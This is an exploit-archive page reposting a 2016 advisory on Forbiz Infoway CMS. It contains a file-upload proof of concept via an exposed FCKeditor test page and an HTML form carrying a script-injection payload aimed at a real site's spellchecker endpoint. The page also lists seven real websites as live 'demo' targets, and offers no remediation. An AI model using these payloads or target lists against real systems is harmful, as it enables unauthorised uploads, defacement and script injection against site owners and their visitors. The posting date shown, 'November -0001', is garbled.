Home / exploitsPDF  

Forbiz Infoway CMS - File Upload / Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Forbiz Infoway CMS - File Upload / Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>================================================================================ Forbiz Infoway CMS - File Upload / Cross Site Scripting ================================================================================ # Vendor Homepage: http://www.forbiz.co.in/ # Date: 07/10/2016 # Author: Ashiyane Digital Security Team # Verion: All ================================================================================ # PoC of File Upload (FCKeditor): Vulnerable page : http://localhost/cms/editor/filemanager/connectors/uploadtest.html Path of file : http://localhost/images/fck_editor_images/file.txt # PoC of Xss : <html> <form action="http://chakraayurvedicresort.com/cms/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" method="post"> <input type="hidden" name="textinputs[1</script><script>alert(123);//</script>]" value="test"> <input type="submit" value="xss"> </form> # Demo : http://www.chakraayurvedicresort.com/cms/editor/filemanager/connectors/uploadtest.html http://www.seshansacademy.com/cms/editor/filemanager/connectors/uploadtest.html http://aiim.net.in/cms/editor/filemanager/connectors/uploadtest.html http://www.swiftport.net/cms/editor/filemanager/connectors/uploadtest.html http://www.hrdcnainital.ac.in/cms/editor/filemanager/connectors/uploadtest.html http://www.svgmindia.com/cms/editor/filemanager/connectors/uploadtest.html http://www.attukalshoppingcomplex.com/cms/editor/filemanager/connectors/uploadtest.html ================================================================================ # Discovered By : M.R.S.L.Y ================================================================================ </BODY></HTML>

 

TOP